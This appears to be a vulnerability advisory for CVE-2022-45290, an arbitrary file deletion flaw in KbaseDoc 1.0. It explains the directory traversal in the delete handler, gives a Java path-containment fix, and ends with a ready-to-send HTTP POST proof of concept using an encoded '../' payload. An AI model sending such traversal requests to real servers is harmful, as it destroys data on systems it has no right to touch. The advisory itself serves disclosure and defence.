KbaseDoc V1.0 has an arbitrary file deletion vulnerability

Description:


KbaseDoc has an arbitrary file deletion vulnerability in src/main/java/com/eastrobot/doc/web/IndexController.java.

Source code download address: https://github.com/ekoz/kbase-doc

Version: 1.0

Discoverer: WBH of Chaitin Tech

CVE: CVE-2022-45290

Vulnerability analysis:


The vulnerable code is located in src/main/java/com/eastrobot/doc/web/IndexController.java.

The POST request handler reads the name parameter. Because the value is not filtered, sequences such as ../ can be spliced into the file path, which causes directory traversal. Because the handler deletes the resulting file, the result is an arbitrary file deletion vulnerability.
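A containment check that would stop the traversal described above, as an added example (not code from kbase-doc; the class name, method names and the temporary directory layout are hypothetical and constructed for the demonstration):

```java
import java.io.IOException;
import java.nio.file.Files;
import java.nio.file.Path;

public class SafeDeleteDemo {

    // Hypothetical helper: resolve the user-supplied name against the base
    // directory and refuse anything that ends up outside it.
    static Path resolveInside(Path baseDir, String name) throws IOException {
        Path base = baseDir.toRealPath();              // canonical base, symlinks resolved
        Path target = base.resolve(name).normalize();  // collapses "../" segments
        // Absolute names replace the base in resolve(), so they fail this check too.
        if (!target.startsWith(base) || target.equals(base)) {
            throw new SecurityException("path escapes base directory: " + name);
        }
        return target;
    }

    static boolean deleteByName(Path baseDir, String name) throws IOException {
        return Files.deleteIfExists(resolveInside(baseDir, name));
    }

    public static void main(String[] args) throws IOException {
        // Constructed layout: poc.txt sits two levels above the base directory.
        Path root = Files.createTempDirectory("kbase-demo");
        Path base = Files.createDirectories(root.resolve("a").resolve("b"));
        Path outside = Files.createFile(root.resolve("poc.txt"));
        Path inside = Files.createFile(base.resolve("doc.txt"));

        // Unfiltered splice, the pattern the analysis describes: leaves the base.
        System.out.println("naive resolve -> " + base.resolve("../../poc.txt").normalize());

        try {
            deleteByName(base, "../../poc.txt");       // decoded form of name=..%2F..%2Fpoc.txt
        } catch (SecurityException e) {
            System.out.println("rejected: " + e.getMessage());
        }
        System.out.println("poc.txt still exists: " + Files.exists(outside));
        System.out.println("doc.txt deleted: " + deleteByName(base, "doc.txt"));
        System.out.println("doc.txt still exists: " + Files.exists(inside));
    }
}
```

normalize() is purely lexical, so if the base directory can contain symbolic links, also compare the target's toRealPath() against the base before deleting.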

Reproducing the vulnerability


Download the source code and build the local environment.

Create a poc.txt file in the kbase-doc-master\target\classes directory.

Use Burp Suite to construct the following request.

[+] POC:

POST /index/delete HTTP/1.1
Host: test:8081
Content-Length: 22
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: */*
Origin: chrome-extension://coohjcphdfgbiolnekdpbcijmhambjff
Accept-Encoding: gzip, deflate
Accept-Language: en,zh-CN;q=0.9,zh;q=0.8
Cookie:__utma=71411734.247469081.1654064241.1654064241.1654064241.1; __utmz=71411734.1654064241.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
Connection: close

name=..%2F..%2Fpoc.txt

After the request is sent, poc.txt has been deleted.

Proof and Exploit:

